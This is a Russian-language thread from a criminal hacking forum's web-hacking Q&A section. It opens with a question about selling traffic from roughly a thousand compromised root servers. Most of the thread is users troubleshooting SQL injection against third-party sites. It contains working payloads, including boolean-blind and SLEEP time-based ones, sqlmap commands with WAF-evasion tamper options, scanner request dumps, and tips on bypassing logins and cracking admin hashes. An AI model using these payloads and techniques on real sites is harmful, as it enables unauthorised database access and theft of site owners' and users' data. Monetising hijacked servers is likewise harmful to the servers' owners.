• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Сколько вообще можно заработать на трафике? К примеру есть ~1000 серверов(root), средний трафик ~20 уников в сутки, кому продавать? Можно ли продавать CPC партнёркам, где цена за клик ~10 центов? Или партнёрки на раз спалят, что трафик не легальный и забанят?
 
Всем привет. Нашел SQL инъекцию вида example.com/?145373657'%20or%20'3719'%3d'3719=1 .

Имя произвольно заданного параметра URL, по-видимому, уязвимо для атак SQL-инъекций. Payloads 45373657' или '3719'='3719 и 20419472' или '9217'='9224 были отправлены с именем произвольно заданного параметра URL. Эти два запроса привели к разным ответам, указывающим на то, что входные данные включаются в SQL-запрос небезопасным способом.

Сталкивался кто?
 
Всем привет. Нашел SQL инъекцию вида example.com/?145373657'%20or%20'3719'%3d'3719=1 .

Имя произвольно заданного параметра URL, по-видимому, уязвимо для атак SQL-инъекций. Payloads 45373657' или '3719'='3719 и 20419472' или '9217'='9224 были отправлены с именем произвольно заданного параметра URL. Эти два запроса привели к разным ответам, указывающим на то, что входные данные включаются в SQL-запрос небезопасным способом.

Сталкивался кто?
payload = 145373657'%20or%20'3719'%3d'3719=1
попробуй декодируй и получишь нагрузку в чистом виде, ну тут и так можно разобраться %20 это пробел например
 
payload = 145373657'%20or%20'3719'%3d'3719=1
попробуй декодируй и получишь нагрузку в чистом виде, ну тут и так можно разобраться %20 это пробел например
В декодер сразу и вставил)) Плюс описание было) Вопрос к какой инъекции данная относится? Union based, error based, blind based? Получится авторизацию в wp пройти при помощи даннного пейлоада?
 
В декодер сразу и вставил)) Плюс описание было) Вопрос к какой инъекции данная относится? Union based, error based, blind based? Получится авторизацию в wp пройти при помощи даннного пейлоада?
ну а ты сам подумай, к чему приводит такой запрос на сайте ? ты же можешь сам посмотреть всё на сайте браузером, или ещё лучше бурпом. Посмотреть что происходит, понять, запомнить ?

по поводу того, поможет ли тебе пройти это авторизацию, ну к чему приводит SQLi? ты будешь в базе, как там храняться данные мы не вкурсе. Скорее всего там будет база админская с логином(и) и хешем(и), сможешь раскрыть хеш, сможешь обойти авторизацию.
Но что там , и что ты можешь мы не вкурсе :)
 
ну а ты сам подумай, к чему приводит такой запрос на сайте ? ты же можешь сам посмотреть всё на сайте браузером, или ещё лучше бурпом. Посмотреть что происходит, понять, запомнить ?

по поводу того, поможет ли тебе пройти это авторизацию, ну к чему приводит SQLi? ты будешь в базе, как там храняться данные мы не вкурсе. Скорее всего там будет база админская с логином(и) и хешем(и), сможешь раскрыть хеш, сможешь обойти авторизацию.
Но что там , и что ты можешь мы не вкурсе :)
Единственное, что происходит после данного пейлоада это увеличение байт заголовока Content-Length. Ясное дело все смотрел, но так как не сталкивался с данным payloads поинтересовался. Обходил ранее при помощи sql ing авторизацию и оказывался без логина и пароля во фронте cms на другом ресурсе. На этом не канает так. Sqlmap ковырял при помощи
Код:
sqlmap -u "https://url?p=*" --level=4 --risk=3 --random-agent --batch --dbs -b -o -v3

По итогу после каждого пейлоада sqlmap ругается на SSL connection error occurred for 'PROTOCOL_TLSv1_2' ('TimeoutError: _ssl.c:980: The handshake operation timed out'). Пока завис, думаю........
 
Единственное, что происходит после данного пейлоада это увеличение байт заголовока Content-Length. Ясное дело все смотрел, но так как не сталкивался с данным payloads поинтересовался. Обходил ранее при помощи sql ing авторизацию и оказывался без логина и пароля во фронте cms на другом ресурсе. На этом не канает так. Sqlmap ковырял при помощи
Код:
sqlmap -u "https://url?p=*" --level=4 --risk=3 --random-agent --batch --dbs -b -o -v3

По итогу после каждого пейлоада sqlmap ругается на SSL connection error occurred for 'PROTOCOL_TLSv1_2' ('TimeoutError: _ssl.c:980: The handshake operation timed out'). Пока завис, думаю........
ты не понимаешь что этот пейлоад просто загремерирован мапой, и он ни чем не отличается от 1 or 1-1 = 1
если честно я не обладаю сильными навыками, сам только учусь, и было бы неплохо увидеть сам гет-запрос и там уже будет ясно.

и я про то, что если ты нашёл уязвимость каким-то сканером, не факт что на самом деле уязвимость там есть.
и лучше после сканера нащупать это место руками и только потом вкрывать что-то в мапе. КПД мапы возрастёт у тебя в разы, потому что ты будешь понимать какие параметры нужно исопльзовать
 
По итогу после каждого пейлоада sqlmap ругается на SSL connection error occurred for 'PROTOCOL_TLSv1_2' ('TimeoutError: _ssl.c:980: The handshake operation timed out'). Пока завис, думаю........
Так WAF может срабатывать, сбрасывая коннект или таймаутить. Руками надо ковырять, ибо ни#уя непонятно.
 
подскажите плиз куда дальше копать

Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://site.com:80/www/admin/assets/min.php?g=oxp-js&v=3.0.2&-5731') OR 4131=4131 AND ('eJkU' LIKE 'eJkU
Vector: OR [INFERENCE]

[21:56:27] [INFO] the back-end DBMS is FrontBase
web application technology: Apache 2
back-end DBMS: FrontBase
[21:56:27] [WARNING] schema names are going to be used on FrontBase for enumeration as the counterpart to database names on other DBMSes
[21:56:27] [INFO] fetching database (schema) names
[21:56:27] [INFO] fetching number of databases
[21:56:27] [PAYLOAD] %u002D%u0039%u0038%u0031%u0034
[21:56:32] [DEBUG] resuming configuration option 'code' (403)
далее идут payload_ы
[21:56:46] [INFO] retrieved:
[21:56:46] [DEBUG] performed 3 queries in 14.03 seconds
[21:56:46] [ERROR] unable to retrieve the number of databases
[21:56:46] [INFO] falling back to current database
[21:56:46] [INFO] fetching current database
опять payloads
[21:57:00] [INFO] retrieved:
[21:57:00] [DEBUG] performed 3 queries in 13.64 seconds
[21:57:00] [WARNING] on FrontBase you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[21:57:00] [CRITICAL] unable to retrieve the database names

sqlmap -u "http://site.com/www/admin/assets/min.php?g=oxp-js&v=3.0.2&*" --referer="http://site.com/www/admin/index.php" --cookie="dcc9ff54145c2325dbe628bc8cd3aa0e" --level 5 --risk 3 --random-agent --tamper="space2morehash,charunicodeencode" --batch --no-cast --time-sec=20 -v3 --technique=B --dbs

Подскажите как это делать [21:57:00] [WARNING] on FrontBase you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
 
забыл добавить
[21:35:59][FIREWALL] detected website protection identified as 'Apache Generic'

[=] blocked categories: SQLi, XPATHi, XXE, LDAPi, PHPi, ACE, PT
[=] signature: '2eb2:RVZXum60OEhCWapAYKYPk4JzWOpohM4JiUYMr2RWg1uQJbX2uhZOnthsOj6hXrAA16BcPhJOdLoXo2tKaK99n+i7c4VmkwI3FZjxtDtAeq+c36A5chW1XaTD'
[+] blind match: 'Shield Security (One Dollar Plugin)' (71%), 'Kona Site Defender (Akamai Technologies)' (71%), 'StackPath' (69%), 'SecureIIS Web Server Security (BeyondTrust)' (69%), 'SecuPress' (69%)
 
Последнее редактирование:
подскажите как это вообще скормить , и скармливается это вообще .
Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';1000',now())' at line 1
Error No: 1064
insert into 404s_report values ('bulk-ethernet-cable/1'"1000',now()); in /var/www/html/system/library/db/mysqli.php on line 41

акунетикс


High

SQL injection​


URL:https://site.com/bulk-ethernet-cable/

Attack Details​


Error message found:
You have an error in your SQL syntax

GET /bulk-ethernet-cable/1'"1000 HTTP/1.1
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
Cookie: PHPSESSID=j1esm6sehk9jlejetrtrjpbl62; language=en; currency=USD; 89ce441c486331cb66a9e54f3844ada4=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.site.com
Connection: Keep-alive
________________________________________________________________

Netsparker


GET /bulk-ethernet-cable/1'%221000 HTTP/1.1
Host: www.site.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36


Out-of-date Version (PHP)​

CRITICAL

 
подскажите как это вообще скормить , и скармливается это вообще .
Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';1000',now())' at line 1
Error No: 1064
insert into 404s_report values ('bulk-ethernet-cable/1'"1000',now()); in /var/www/html/system/library/db/mysqli.php on line 41

акунетикс


High

SQL injection​


URL:https://site.com/bulk-ethernet-cable/

Attack Details​


Error message found:
You have an error in your SQL syntax

GET /bulk-ethernet-cable/1'"1000 HTTP/1.1
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
Cookie: PHPSESSID=j1esm6sehk9jlejetrtrjpbl62; language=en; currency=USD; 89ce441c486331cb66a9e54f3844ada4=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.site.com
Connection: Keep-alive
________________________________________________________________

Netsparker


GET /bulk-ethernet-cable/1'%221000 HTTP/1.1
Host: www.site.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36


Out-of-date Version (PHP)​

CRITICAL

Пробуй через -r
Замени в запросе '%221000 на *
 
Последнее редактирование:
пробовал пробовал( , что то мешает по ходу, там и бурп понаходил кучу скуль, немогу довести никак .
GET /bulk-ethernet-cable/1'"1000 HTTP/1.1
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
Руками надо чекать и искать где именно инъекция. Возможно она не в гет-запросе, а в одном из хидеров.
 
Всем привет
подскажите пжл сканер acunetix нужно ставить на сервер или можно полноценно работать и без него ?
На виртуалке кали, вполне не плохо себя чувствует)
 
Хай всем.
Подскажите еще вот , как прально составить запрос. Ниче не получается.

Netsparker

GET /product_id=130027%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f%20%2f*%20498607ab-ed98-4eb2-8dda-6ecb053c1806%20*%2f HTTP/1.1
Host: site.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: _gat=1; _ga=GA1.2.1142136944.1669307868; _gid=GA1.2.416229552.1669307868
Referer: https://site.com/sitemap.xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
 
подскажите плиз куда дальше копать

FrontBase
данный тип баз редкость

Так написано ведь_ импользовать именна схем других баз)
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх